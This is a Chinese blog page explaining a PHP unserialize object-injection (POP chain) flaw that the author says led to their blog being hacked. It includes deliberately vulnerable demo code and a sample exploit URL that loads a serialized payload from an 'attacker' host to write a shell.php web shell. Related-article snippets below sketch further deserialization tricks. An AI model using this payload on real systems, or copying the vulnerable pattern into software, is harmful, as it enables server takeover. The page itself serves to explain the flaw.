php自动序列化,php序列化函数unserialize对象注入漏洞(也成为pop链漏洞)

最新推荐文章于 2023-06-30 08:46:15 发布
最新推荐文章于 2023-06-30 08:46:15 发布
阅读量326 收藏
点赞数
文章标签: php自动序列化
本文揭示了一种隐蔽的对象注入漏洞,该漏洞存在于PHP应用中。攻击者可以通过构造特定的HTTP请求,利用存在__destruct方法的类,结合unserialize函数,导致恶意代码执行。条件包括:含有魔幻方法的类、不安全的unserialize调用和从文件中读取序列化数据。了解这种漏洞有助于提升PHP应用的安全性。
摘要由CSDN通过智能技术生成

今天发现主站 https://www.tipsns.com 对应的官方博客

http://blog.tipsns.com 居然被别人黑了挂了木马,

最后发现了一个非常隐蔽的对象注入漏洞,这里是演示对象注入漏洞的测试程序:class foo{

private $file = "test.txt";

private $data = "text";

public function __destruct()

{

file_put_contents($this->file, $this->data);

}

}

$filename = $_GET['filename'];

echo "Readfile filename
" . PHP_EOL;

if(file_exists($filename)) {

unserialize(file_get_contents($filename));

} else {

echo 'no file
' . PHP_EOL;

}

这段代码有三个漏洞触发条件:

1、应用程序中必须含有一个实现某个PHP魔幻方法(例如__wakeup或者__destruct)的类,可以用这个类进行恶意攻击,或者开始一个“POP链”。

2、当调用脆弱的unserialize()时,必须声明攻击期间所使用的所有类,否则必须为这些类支持对象自动加载。

3、传递给反序列化操作的数据必须来自于一个文件,所以服务器上必须包含有一个包含序列化数据的文件。

这里特别注意serialize触发__wakeup, unserialize触发__destruct 都可以在不知不觉中导致漏洞发生

比如通过:http://localhost/unserialize.php?filename=http://attacker/exp.txt

包含内容O:3:%22foo%22:2:{s:4:%22file%22;s:9:%22shell.php%22;s:4:%22data%22;s:5:%22aaaa%22;}

然后就可以通过写入的shell.php执行任意代码

一身诗意千寻瀑zz
关注
21-5 PHP序列化漏洞-POP构造
weixin_43263566的博客
01-20 453
举例来说,假设有以下调用关系:A --> B,B --> C,A --> B --> C。在读代码时,会遇到很多干扰函数或代码,这些函数或代码没有任何作用,只会干扰我们的阅读。总之,要想有效地读懂代码,需要对编程语言的语法和常见函数有一定的了解,同时要有耐心和细心,逐行分析代码,找出关键点。方法中使用了正则表达式检查,我们需要构造一个恶意的序列化对象,以绕过正则表达式的检测。首先,根据代码中的逻辑,我们需要构造一个经过序列化的有效对象,并将其作为。: 这是一个构造函数的魔术方法,在创建类的实例时自动调用。
web安全渗透测试十大常规项(一):web渗透测试之PHP序列化
最新发布
HACKONE的博客
06-16 730
POP:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用的方法,序列化攻击都在PHP魔术方法中出现可利用的漏洞,因自动调用触发漏洞,但如关键代码没在魔术方法中,而是在一个类的普通方法中。漏洞危害:如存在__wakeup方法,调用unserilize()方法前则先调用__wakeup方法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup执行。__isset(): //在不可访问的属性上调用isset()或empty()触发。
PHP】反序列化漏洞(又名“PHP对象注入”)
weixin_45844670的博客
08-22 3572
PHP对象注入(俗称反序列化漏洞)相关函数漏洞成因实现例子 相关函数 在利用这个漏洞之前我们要先了解相关的函数都有什么,弱点在哪里 看不懂下面的不要紧 后面我会慢慢解释 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 integer、float、string、array 或 object。如果传递的字符串不可解序列化,则返回 FALSE。与之相对的函数serialize()序列化函数。 掌握语言的最好方法就是自己动手敲 我们举个例子 &l
php 使用serialize() 和 unserialize() 让对象成超级变量
自强不息
04-03 145
手册里面的原话和一些总结: php函数serialize()与unserialize()说明及案例。想要将已序列化的字符串变回 PHP 的值,可使用unserialize()。serialize()可处理除了resource之外的任何类型。甚至可以serialize()那些包含了指向其自身引用的数组。你正serialize()的数组/对象中的引用也将被存储。 serialize()返回字符串,...
php序列化 对象注入漏洞
苟有恒,必有三更眠,五更起。
03-10 642
简介 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。 分析 php基础 serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的, 比如 __construct,...
一道php序列化题的pop构造
内心不种满鲜花就会长满杂草
05-19 1133
题目代码如下,其中像套娃一样,多次对魔术方法进行调用,挺烧脑。根据题目,显然目标是echo $flag。最后提交反序列化字符串,获取flag。最后我们用代码实现pop的构造。然后访问,输出反序列化字符串。需要把var改为私有属性。倒退分析后,接着正推。
php unserialize()
weixin_30432179的博客
07-02 376
unserialize—从已存储的表示中创建 PHP 的值 mixed unserialize(string$str) unserialize()对单一的已序列化的变量进行操作,将其转换回 PHP 的值。 参数str : 序列化后的字符串。 若被解序列化的变量是一个对象,在成功地重新构造对象之后,PHP自动地试图去调用__wakeup()成员函数(如果存在的话)。 ...
ctf之php序列化,CTF——Web——PHP序列化和反序列化
weixin_35126200的博客
04-01 948
PHP 序列化和反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serializeunserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
PHP序列化题目记录
BaiScorpio的博客
06-20 887
最近跑去看了下PHP序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化POP序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
PHP序列化—构造POP
Lemon's blog
04-03 4624
前言: 最近在刷题的时候发现这个PHP序列化POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
PHP源码中unserialize函数引发的漏洞分析
cnbird's blog
03-07 1590
0×01 unserialize函数的概念 首先看下官方给出的解释:unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 integer、float、string、array 或 object。如果传递的字符串不可解序列化,则返回 FALSE。若被解序列化的变量是一个对象,在成功地重新构造对象之后,PHP自动地试图去调用 __wak
微型php框架 include/config.php
weixin_33978016的博客
07-11 354
配置文件<?phpdefined('ACC')||exit('Access Denied');$cfg = array();$cfg['host'] = 'localhost';$cfg['user'] = 'root';$cfg['pwd'] = '111111';$cfg['db'] = 'php0620';$cfg['port'] = '3306';$cfg['c...
PHP 过滤 unserialize()
unber的博客
06-30 144
PHP 7 增加了可以为 unserialize() 提供过滤的特性,可以防止非法数据进行代码注入,提供了更安全的反序列化数据。
php 删除一个对象的属性值,PHP Unserialize删除对象属性
weixin_42360899的博客
03-21 683
我有代码正在序列化PDOException,通过线路发送它,然后在以后反序列化它.当我反序列化它时,$code属性似乎丢失了.对象的其余部分显示不变.我的代码是针对PostgreSQL数据库运行的.使用以下DDL:CREATE TABLE test (id INTEGER);使用以下代码重现我的问题(替换您自己的PostgeSQL连接值):$dsn = "pgsql: dbname=postgre...
php伪终端,四个实例递进php序列化漏洞理解
weixin_33826994的博客
03-16 232
索引最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行!D0g3为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台~题目平台地址:http://ct...
mysql 反序列化函数_利用phar协议造成php序列化
weixin_39843986的博客
01-21 432
0x00前言在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了0x01 构造有反序列化payload的phar文件首先,phar是一种php语言的文件的后缀,所以生成phar文件...
unserialize序列化漏洞
weixin_45634365的博客
03-27 741
一、序列化 序列化(serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区,之后可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单地说,就是将状态信息保存为字符串。例如,将PHP中的对象、类、数组、变量、匿名函数等转化为字符串,方便保存到数据库或者文件中。 反序列化序列化是将对象的状态信息转为字符串储存起来,反序列化就是将字符串转化为状态信息,即从新将状态信息拿出来使用。 ...
php函数serialize()与unserialize()
larance的挨踢生活
08-31 860
本文转自:http://zxianf.blog.163.com/blog/static/30120701201072443623381/ php函数serialize()与unserialize()说明及案例。想要将已序列化的字符串变回 PHP 的值,可使用unserial
php serialize()和unserialize()的一个坑
木子空间
09-17 7636
有个业务需求
php序列化挖掘技巧探索
PHP序列化漏洞利用中,有两个核心条件:一是能找到可以进行反序列化的点,二是构建合理的popchain。这两个条件结合可以导致远程代码执行(RCE)、文件操作和信息泄露等安全问题。作者指出,他们在这两天的挖...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值